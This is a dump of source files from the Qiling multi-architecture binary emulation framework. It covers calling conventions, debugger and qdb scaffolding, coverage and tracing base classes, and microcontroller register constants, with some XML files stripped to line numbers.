#!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | 5 | from unicorn.mips_const import UC_MIPS_REG_V0, UC_MIPS_REG_A0, UC_MIPS_REG_A1, UC_MIPS_REG_A2, UC_MIPS_REG_A3 6 | 7 | from qiling.cc import QlCommonBaseCC, make_arg_list 8 | 9 | class mipso32(QlCommonBaseCC): 10 | _retreg = UC_MIPS_REG_V0 11 | _argregs = make_arg_list(UC_MIPS_REG_A0, UC_MIPS_REG_A1, UC_MIPS_REG_A2, UC_MIPS_REG_A3) 12 | _shadow = 4 13 | _retaddr_on_stack = False 14 | 15 | def setReturnAddress(self, addr: int): 16 | self.arch.regs.ra = addr 17 | 18 | @staticmethod 19 | def getNumSlots(argbits: int): 20 | return 1 21 | 22 | def unwind(self, nslots: int) -> int: 23 | # TODO: stack frame unwiding? 24 | return self.arch.regs.ra 25 | -------------------------------------------------------------------------------- /qiling/cc/ppc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | 5 | from unicorn.ppc_const import ( 6 | UC_PPC_REG_3, UC_PPC_REG_4, UC_PPC_REG_5, 7 | UC_PPC_REG_6, UC_PPC_REG_7, UC_PPC_REG_8, 8 | ) 9 | 10 | from qiling.cc import QlCommonBaseCC, make_arg_list 11 | 12 | 13 | class ppc(QlCommonBaseCC): 14 | """Default calling convention for PPC 15 | First 6 arguments are passed in regs, the rest are passed on the stack. 16 | """ 17 | 18 | _retreg = UC_PPC_REG_3 19 | _argregs = make_arg_list(UC_PPC_REG_3, UC_PPC_REG_4, UC_PPC_REG_5, UC_PPC_REG_6, UC_PPC_REG_7, UC_PPC_REG_8) 20 | 21 | @staticmethod 22 | def getNumSlots(argbits: int): 23 | return 1 24 | 25 | def setReturnAddress(self, addr: int): 26 | self.arch.regs.lr = addr 27 | -------------------------------------------------------------------------------- /qiling/cc/riscv.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | 5 | from unicorn.riscv_const import ( 6 | UC_RISCV_REG_A0, UC_RISCV_REG_A1, UC_RISCV_REG_A2, 7 | UC_RISCV_REG_A3, UC_RISCV_REG_A4, UC_RISCV_REG_A5 8 | ) 9 | 10 | from qiling.cc import QlCommonBaseCC, make_arg_list 11 | 12 | 13 | class riscv(QlCommonBaseCC): 14 | """Default calling convention for RISCV 15 | First 6 arguments are passed in regs, the rest are passed on the stack. 16 | """ 17 | 18 | _retreg = UC_RISCV_REG_A0 19 | _argregs = make_arg_list(UC_RISCV_REG_A0, UC_RISCV_REG_A1, UC_RISCV_REG_A2, UC_RISCV_REG_A3, UC_RISCV_REG_A4, UC_RISCV_REG_A5) 20 | 21 | @staticmethod 22 | def getNumSlots(argbits: int): 23 | return 1 24 | 25 | def setReturnAddress(self, addr: int): 26 | self.arch.regs.ra = addr 27 | -------------------------------------------------------------------------------- /qiling/debugger/__init__.py: -------------------------------------------------------------------------------- 1 | from .debugger import QlDebugger 2 | # from .disassember import QlDisassember 3 | # from .utils import QlReadELF 4 | -------------------------------------------------------------------------------- /qiling/debugger/debugger.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from typing import TYPE_CHECKING 7 | 8 | 9 | if TYPE_CHECKING: 10 | from qiling import Qiling 11 | 12 | 13 | class QlDebugger: 14 | def __init__(self, ql: 'Qiling'): 15 | self.ql = ql 16 | 17 | def run(self): 18 | raise NotImplementedError 19 | -------------------------------------------------------------------------------- /qiling/debugger/gdb/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/qiling/debugger/gdb/__init__.py -------------------------------------------------------------------------------- /qiling/debugger/gdb/xml/a8086/target.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | i8086 5 | 6 | -------------------------------------------------------------------------------- /qiling/debugger/gdb/xml/arm/arm-fpa.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | 9 | 10 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /qiling/debugger/gdb/xml/arm/arm-m-profile.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /qiling/debugger/gdb/xml/arm/arm-vfpv2.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /qiling/debugger/gdb/xml/arm/target.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | 9 | 10 | arm 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /qiling/debugger/gdb/xml/arm64/target.xml: -------------------------------------------------------------------------------- 1 | 2 | 8 | 9 | 10 | 11 | aarch64 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /qiling/debugger/gdb/xml/mips/mips-cp0.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /qiling/debugger/gdb/xml/mips/target.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | 9 | 10 | mips 11 | GNU/Linux 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /qiling/debugger/gdb/xml/x86/32bit-avx.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /qiling/debugger/gdb/xml/x86/32bit-avx512.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /qiling/debugger/gdb/xml/x86/32bit-linux.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /qiling/debugger/gdb/xml/x86/32bit-pkeys.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /qiling/debugger/gdb/xml/x86/32bit-segments.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /qiling/debugger/gdb/xml/x86/target.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | i386 5 | GNU/Linux 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /qiling/debugger/gdb/xml/x8664/64bit-avx.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /qiling/debugger/gdb/xml/x8664/64bit-linux.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /qiling/debugger/gdb/xml/x8664/64bit-pkeys.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /qiling/debugger/gdb/xml/x8664/64bit-segments.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /qiling/debugger/gdb/xml/x8664/target.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | i386:x86-64 5 | GNU/Linux 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /qiling/debugger/qdb/README.md: -------------------------------------------------------------------------------- 1 | For latest documentation, please visit https://docs.qiling.io/en/latest/qdb/ 2 | -------------------------------------------------------------------------------- /qiling/debugger/qdb/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from .qdb import QlQdb 4 | -------------------------------------------------------------------------------- /qiling/debugger/qdb/arch/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .arch_x86 import ArchX86 7 | from .arch_mips import ArchMIPS 8 | from .arch_arm import ArchARM, ArchCORTEX_M 9 | from .arch_x8664 import ArchX8664 -------------------------------------------------------------------------------- /qiling/debugger/qdb/arch/arch.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | 7 | from qiling.const import QL_ARCH 8 | from unicorn import UC_ERR_READ_UNMAPPED 9 | import unicorn 10 | 11 | 12 | class Arch: 13 | """ 14 | base class for arch 15 | """ 16 | 17 | def __init__(self): 18 | pass 19 | 20 | @property 21 | def arch_insn_size(self): 22 | return 4 23 | 24 | @property 25 | def archbit(self): 26 | return 4 27 | 28 | def read_insn(self, address: int): 29 | try: 30 | result = self.read_mem(address, self.arch_insn_size) 31 | except unicorn.unicorn.UcError as err: 32 | result = None 33 | 34 | return result 35 | -------------------------------------------------------------------------------- /qiling/debugger/qdb/arch/arch_mips.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | 7 | 8 | from .arch import Arch 9 | 10 | class ArchMIPS(Arch): 11 | def __init__(self): 12 | super().__init__() 13 | 14 | @property 15 | def regs(self): 16 | return ( 17 | "gp", "at", "v0", "v1", 18 | "a0", "a1", "a2", "a3", 19 | "t0", "t1", "t2", "t3", 20 | "t4", "t5", "t6", "t7", 21 | "t8", "t9", "sp", "s8", 22 | "s0", "s1", "s2", "s3", 23 | "s4", "s5", "s6", "s7", 24 | "ra", "k0", "k1", "pc", 25 | ) 26 | 27 | @property 28 | def regs_need_swapped(self): 29 | return { 30 | "fp": "s8", 31 | } 32 | -------------------------------------------------------------------------------- /qiling/debugger/qdb/branch_predictor/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .branch_predictor import BranchPredictor 7 | from .branch_predictor_x86 import BranchPredictorX86 8 | from .branch_predictor_mips import BranchPredictorMIPS 9 | from .branch_predictor_arm import BranchPredictorARM, BranchPredictorCORTEX_M 10 | from .branch_predictor_x8664 import BranchPredictorX8664 11 | -------------------------------------------------------------------------------- /qiling/debugger/qdb/branch_predictor/branch_predictor.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from abc import abstractmethod 7 | from ..context import Context 8 | 9 | 10 | class Prophecy: 11 | """ 12 | container for storing result of the predictor 13 | @going: indicate the certian branch will be taken or not 14 | @where: where will it go if going is true 15 | """ 16 | 17 | def __init__(self): 18 | self.going = False 19 | self.where = None 20 | 21 | def __iter__(self): 22 | return iter((self.going, self.where)) 23 | 24 | class BranchPredictor(Context): 25 | """ 26 | Base class for predictor 27 | """ 28 | 29 | def read_reg(self, reg_name): 30 | """ 31 | read specific register value 32 | """ 33 | 34 | return self.ql.arch.regs.read(reg_name) 35 | 36 | @abstractmethod 37 | def predict(self) -> Prophecy: 38 | """ 39 | Try to predict certian branch will be taken or not based on current context 40 | """ 41 | -------------------------------------------------------------------------------- /qiling/debugger/qdb/const.py: -------------------------------------------------------------------------------- 1 | from enum import IntEnum 2 | 3 | class color: 4 | """ 5 | class for colorful prints 6 | """ 7 | CYAN = '\033[96m' 8 | PURPLE = '\033[95m' 9 | BLUE = '\033[94m' 10 | YELLOW = '\033[93m' 11 | GREEN = '\033[92m' 12 | RED = '\033[91m' 13 | DARKGRAY = '\033[90m' 14 | WHITE = '\033[48m' 15 | DARKCYAN = '\033[36m' 16 | BLACK = '\033[35m' 17 | UNDERLINE = '\033[4m' 18 | BOLD = '\033[1m' 19 | END = '\033[0m' 20 | RESET = '\x1b[39m' 21 | 22 | class QDB_MSG(IntEnum): 23 | ERROR = 10 24 | INFO = 20 25 | -------------------------------------------------------------------------------- /qiling/debugger/qdb/render/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .render import ContextRender 7 | from .render_x86 import ContextRenderX86 8 | from .render_mips import ContextRenderMIPS 9 | from .render_arm import ContextRenderARM, ContextRenderCORTEX_M 10 | from .render_x8664 import ContextRenderX8664 11 | -------------------------------------------------------------------------------- /qiling/debugger/qdb/render/render_mips.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | 7 | 8 | from .render import * 9 | from ..arch import ArchMIPS 10 | 11 | class ContextRenderMIPS(ContextRender, ArchMIPS): 12 | """ 13 | context render for MIPS 14 | """ 15 | 16 | def __init__(self, ql, predictor): 17 | super().__init__(ql, predictor) 18 | ArchMIPS.__init__(self) 19 | 20 | @Render.divider_printer("[ REGISTERS ]") 21 | def context_reg(self, saved_reg_dump): 22 | """ 23 | redering context registers 24 | """ 25 | 26 | cur_regs = self.dump_regs() 27 | cur_regs = self.swap_reg_name(cur_regs) 28 | diff_reg = self.reg_diff(cur_regs, saved_reg_dump) 29 | self.render_regs_dump(cur_regs, diff_reg=diff_reg) 30 | -------------------------------------------------------------------------------- /qiling/extensions/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/qiling/extensions/__init__.py -------------------------------------------------------------------------------- /qiling/extensions/afl/__init__.py: -------------------------------------------------------------------------------- 1 | from .afl import ql_afl_fuzz, ql_afl_fuzz_custom -------------------------------------------------------------------------------- /qiling/extensions/coverage/README.md: -------------------------------------------------------------------------------- 1 | For latest documentation, please visit https://docs.qiling.io -------------------------------------------------------------------------------- /qiling/extensions/coverage/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/qiling/extensions/coverage/__init__.py -------------------------------------------------------------------------------- /qiling/extensions/coverage/formats/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = ["base", "drcov", "drcov_exact", "ezcov"] 2 | -------------------------------------------------------------------------------- /qiling/extensions/coverage/formats/base.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from abc import ABC, abstractmethod 7 | 8 | from qiling import Qiling 9 | 10 | 11 | class QlBaseCoverage(ABC): 12 | """ 13 | An abstract base class for concrete code coverage collectors. 14 | To add support for a new coverage format, just derive from this class and implement 15 | all the methods marked with the @abstractmethod decorator. 16 | """ 17 | 18 | def __init__(self, ql: Qiling): 19 | super().__init__() 20 | 21 | self.ql = ql 22 | 23 | @property 24 | @staticmethod 25 | @abstractmethod 26 | def FORMAT_NAME() -> str: 27 | raise NotImplementedError 28 | 29 | @abstractmethod 30 | def activate(self): 31 | pass 32 | 33 | @abstractmethod 34 | def deactivate(self): 35 | pass 36 | 37 | @abstractmethod 38 | def dump_coverage(self, coverage_file: str): 39 | pass 40 | -------------------------------------------------------------------------------- /qiling/extensions/coverage/formats/drcov_exact.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .drcov import QlDrCoverage 7 | 8 | 9 | class QlDrCoverageExact(QlDrCoverage): 10 | """ 11 | Collects emulated code coverage and formats it in accordance with the DynamoRIO based 12 | tool drcov: https://dynamorio.org/dynamorio_docs/page_drcov.html 13 | 14 | The resulting output file can later be imported by coverage visualization tools such 15 | as Lighthouse: https://github.com/gaasedelen/lighthouse 16 | """ 17 | 18 | FORMAT_NAME = "drcov_exact" 19 | 20 | def __init__(self, ql): 21 | super().__init__(ql) 22 | 23 | def activate(self): 24 | # We treat every instruction as a block on its own. 25 | self.bb_callback = self.ql.hook_code(self.block_callback, user_data=self) 26 | -------------------------------------------------------------------------------- /qiling/extensions/idaplugin/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/qiling/extensions/idaplugin/__init__.py -------------------------------------------------------------------------------- /qiling/extensions/idaplugin/readme.md: -------------------------------------------------------------------------------- 1 | For latest documentation, please visit https://docs.qiling.io/en/latest/ida/ -------------------------------------------------------------------------------- /qiling/extensions/mcu/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /qiling/extensions/mcu/atmel/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .sam3x8e import sam3x8e 7 | -------------------------------------------------------------------------------- /qiling/extensions/mcu/bes/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .bes2300 import bes2300 7 | -------------------------------------------------------------------------------- /qiling/extensions/mcu/gd32vf1/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .gd32vf103 import gd32vf103 7 | -------------------------------------------------------------------------------- /qiling/extensions/mcu/nxp/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .mk64f12 import mk64f12 7 | -------------------------------------------------------------------------------- /qiling/extensions/mcu/stm32f1/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .stm32f103 import stm32f103 7 | -------------------------------------------------------------------------------- /qiling/extensions/mcu/stm32f4/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .stm32f401 import stm32f401 7 | from .stm32f479 import stm32f479 8 | from .stm32f469 import stm32f469 9 | from .stm32f437 import stm32f437 10 | from .stm32f405 import stm32f405 11 | from .stm32f411 import stm32f411 12 | from .stm32f415 import stm32f415 13 | from .stm32f417 import stm32f417 14 | from .stm32f410 import stm32f410 15 | from .stm32f413 import stm32f413 16 | from .stm32f446 import stm32f446 17 | from .stm32f427 import stm32f427 18 | from .stm32f407 import stm32f407 19 | from .stm32f439 import stm32f439 20 | from .stm32f429 import stm32f429 21 | from .stm32f412 import stm32f412 22 | from .stm32f423 import stm32f423 23 | -------------------------------------------------------------------------------- /qiling/extensions/r2/__init__.py: -------------------------------------------------------------------------------- 1 | from .r2 import R2 2 | -------------------------------------------------------------------------------- /qiling/extensions/report/__init__.py: -------------------------------------------------------------------------------- 1 | from .report import generate_report 2 | -------------------------------------------------------------------------------- /qiling/extensions/sanitizers/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/qiling/extensions/sanitizers/__init__.py -------------------------------------------------------------------------------- /qiling/extensions/tracing/README.md: -------------------------------------------------------------------------------- 1 | For latest documentation, please visit https://docs.qiling.io -------------------------------------------------------------------------------- /qiling/extensions/tracing/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/qiling/extensions/tracing/__init__.py -------------------------------------------------------------------------------- /qiling/extensions/tracing/formats/__init__.py: -------------------------------------------------------------------------------- 1 | # This code structure is copied and modified from the coverage extension 2 | __all__ = ["base", "tenet"] -------------------------------------------------------------------------------- /qiling/extensions/tracing/formats/base.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # This code structure is copied and modified from the coverage extension 5 | 6 | from abc import ABC, abstractmethod 7 | 8 | 9 | class QlBaseTrace(ABC): 10 | """ 11 | An abstract base class for trace collectors. 12 | To add support for a new coverage format, just derive from this class and implement 13 | all the methods marked with the @abstractmethod decorator. 14 | """ 15 | 16 | def __init__(self): 17 | super().__init__() 18 | 19 | @property 20 | @staticmethod 21 | @abstractmethod 22 | def FORMAT_NAME(): 23 | raise NotImplementedError 24 | 25 | @abstractmethod 26 | def activate(self): 27 | pass 28 | 29 | @abstractmethod 30 | def deactivate(self): 31 | pass 32 | 33 | @abstractmethod 34 | def dump_trace(self, trace_file): 35 | pass -------------------------------------------------------------------------------- /qiling/extensions/tracing/utils.py: -------------------------------------------------------------------------------- 1 | # This code structure is copied and modified from the coverage extension 2 | 3 | from contextlib import contextmanager 4 | from .formats import * 5 | 6 | 7 | # Returns subclasses recursively. 8 | def get_all_subclasses(cls): 9 | all_subclasses = [] 10 | 11 | for subclass in cls.__subclasses__(): 12 | all_subclasses.append(subclass) 13 | all_subclasses.extend(get_all_subclasses(subclass)) 14 | 15 | return all_subclasses 16 | 17 | class TraceFactory(): 18 | def __init__(self): 19 | self.trace_collectors = {subcls.FORMAT_NAME:subcls for subcls in get_all_subclasses(base.QlBaseTrace)} 20 | 21 | @property 22 | def formats(self): 23 | return self.trace_collectors.keys() 24 | 25 | def get_trace_collector(self, ql, name): 26 | return self.trace_collectors[name](ql) 27 | 28 | factory = TraceFactory() 29 | 30 | @contextmanager 31 | def collect_trace(ql, name: str, trace_file: str): 32 | """ 33 | Context manager for emulating a given piece of code with tracing. 34 | Example: 35 | with collect_trace(ql, 'tenet', 'trace.0.log'): 36 | ql.run(...) 37 | """ 38 | 39 | trace = factory.get_trace_collector(ql, name) 40 | trace.activate() 41 | try: 42 | yield 43 | finally: 44 | trace.deactivate() 45 | if trace_file: 46 | trace.dump_trace(trace_file) 47 | -------------------------------------------------------------------------------- /qiling/host.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from functools import cached_property 7 | from typing import Optional 8 | import platform 9 | 10 | from qiling import utils 11 | from qiling.const import QL_OS, QL_ARCH 12 | 13 | class QlHost: 14 | """Interface to the hosting platform. 15 | """ 16 | 17 | @cached_property 18 | def os(self) -> Optional[QL_OS]: 19 | """Hosting platform OS type. 20 | """ 21 | 22 | system = platform.system() 23 | 24 | return utils.os_convert(system) 25 | 26 | @cached_property 27 | def arch(self) -> Optional[QL_ARCH]: 28 | """Hosting platform architecture type. 29 | """ 30 | 31 | machine = platform.machine() 32 | 33 | return utils.arch_convert(machine) 34 | -------------------------------------------------------------------------------- /qiling/hw/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .analog import * 7 | from .char import * 8 | from .dma import * 9 | from .flash import * 10 | from .gpio import * 11 | from .i2c import * 12 | from .intc import * 13 | from .math import * 14 | from .mem import * 15 | from .misc import * 16 | from .net import * 17 | from .power import * 18 | from .sd import * 19 | from .spi import * 20 | from .timer import * -------------------------------------------------------------------------------- /qiling/hw/analog/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .sam3xa_adc import SAM3xaAdc 7 | from .sam3xa_dac import SAM3xaDac 8 | from .sam3xa_pwm import SAM3xaPwm 9 | from .stm32f1xx_adc import STM32F1xxAdc 10 | from .stm32f4xx_dac import STM32F4xxDac 11 | from .mk64f12_adc import MK64F12Adc 12 | -------------------------------------------------------------------------------- /qiling/hw/char/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .stm32f1xx_usart import STM32F1xxUsart 7 | from .stm32f4xx_usart import STM32F4xxUsart 8 | from .gd32vf1xx_usart import GD32VF1xxUsart 9 | from .sam3xa_uotghs import SAM3xaUotghs 10 | from .sam3xa_uart import SAM3xaUart 11 | from .mk64f12_uart import MK64F12Uart 12 | -------------------------------------------------------------------------------- /qiling/hw/char/stm32f1xx_usart.py: -------------------------------------------------------------------------------- 1 | import ctypes 2 | 3 | from qiling.hw.char.stm32f4xx_usart import STM32F4xxUsart 4 | 5 | 6 | class STM32F1xxUsart(STM32F4xxUsart): 7 | class Type(ctypes.Structure): 8 | """ the structure available in : 9 | stm32f100xb 10 | stm32f100xe 11 | stm32f101xb 12 | stm32f101xe 13 | stm32f101xg 14 | stm32f102xb 15 | stm32f103xb 16 | stm32f103xe 17 | stm32f103xg 18 | stm32f105xc 19 | stm32f107xc 20 | """ 21 | 22 | _fields_ = [ 23 | ("SR" , ctypes.c_uint32), #USART Status register, Address offset: 0x00 24 | ("DR" , ctypes.c_uint32), #USART Data register, Address offset: 0x04 25 | ("BRR" , ctypes.c_uint32), #USART Baud rate register, Address offset: 0x08 26 | ("CR1" , ctypes.c_uint32), #USART Control register 1, Address offset: 0x0C 27 | ("CR2" , ctypes.c_uint32), #USART Control register 2, Address offset: 0x10 28 | ("CR3" , ctypes.c_uint32), #USART Control register 3, Address offset: 0x14 29 | ("GTPR", ctypes.c_uint32), #USART Guard time and prescaler register, Address offset: 0x18 30 | ] 31 | -------------------------------------------------------------------------------- /qiling/hw/const/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | -------------------------------------------------------------------------------- /qiling/hw/const/cm4_systick.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from enum import IntEnum 7 | 8 | 9 | class SYSTICK_CTRL(IntEnum): 10 | ENABLE = 1 << 0 11 | TICKINT = 1 << 1 12 | CLKSOURCE = 1 << 2 13 | COUNTFLAG = 1 << 16 14 | MASK = ENABLE | TICKINT | CLKSOURCE | COUNTFLAG 15 | -------------------------------------------------------------------------------- /qiling/hw/const/gd32vf1xx_rtc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | 7 | from enum import IntEnum 8 | 9 | 10 | class INTEN(IntEnum): 11 | OVIE = 0x1 << 2 # Overflow interrupt enable 12 | ALRMIE = 0x1 << 1 # Alarm interrupt enable 13 | SCIE = 0x1 << 0 # Second interrupt 14 | 15 | class CTL(IntEnum): 16 | LWOFF = 0x1 << 5 # Last write operation finished flag 17 | CMF = 0x1 << 4 # Configuration mode flag 18 | RSYNF = 0x1 << 3 # Registers synchronized flag 19 | OVIF = 0x1 << 2 # Overflow interrupt flag 20 | ALRMIF = 0x1 << 1 # Alarm interrupt flag 21 | SCIF = 0x1 << 0 # Sencond interrupt flag 22 | 23 | class PSCH(IntEnum): 24 | PSC = 0xf << 0 # RTC prescaler value high 25 | 26 | class PSCL(IntEnum): 27 | PSC = 0xffff << 0 # RTC prescaler value low 28 | 29 | class DIVH(IntEnum): 30 | DIV = 0xf << 0 # RTC divider value high 31 | 32 | class DIVL(IntEnum): 33 | DIV = 0xffff << 0 # RTC divider value low 34 | 35 | class CNTH(IntEnum): 36 | CNT = 0xffff << 0 # RTC counter value high 37 | 38 | class CNTL(IntEnum): 39 | CNT = 0xffff << 0 # RTC counter value low 40 | 41 | class ALRMH(IntEnum): 42 | ALRM = 0xffff << 0 # Alarm value high 43 | 44 | class ALRML(IntEnum): 45 | ALRM = 0xffff << 0 # alarm value low 46 | 47 | -------------------------------------------------------------------------------- /qiling/hw/const/stm32f4xx_pwr.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from enum import IntEnum 7 | 8 | 9 | class PWR_CR(IntEnum): 10 | LPDS = 1 << 0 11 | PDDS = 1 << 1 12 | CWUF = 1 << 2 13 | CSBF = 1 << 3 14 | PVDE = 1 << 4 15 | PLS = 0x7 << 5 16 | DBP = 1 << 8 17 | FPDS = 1 << 9 18 | LPLVDS = 1 << 10 19 | MRLVDS = 1 << 11 20 | ADCDC1 = 1 << 13 21 | VOS = 0x3 << 14 22 | ODEN = 1 << 16 23 | ODSWEN = 1 << 17 24 | UDEN = 0x3 << 18 25 | 26 | class PWR_CSR(IntEnum): 27 | WUF = 1 << 0 28 | SBF = 1 << 1 29 | PVDO = 1 << 2 30 | BRR = 1 << 3 31 | EWUP = 1 << 8 32 | BRE = 1 << 9 33 | VOSRDY = 1 << 14 34 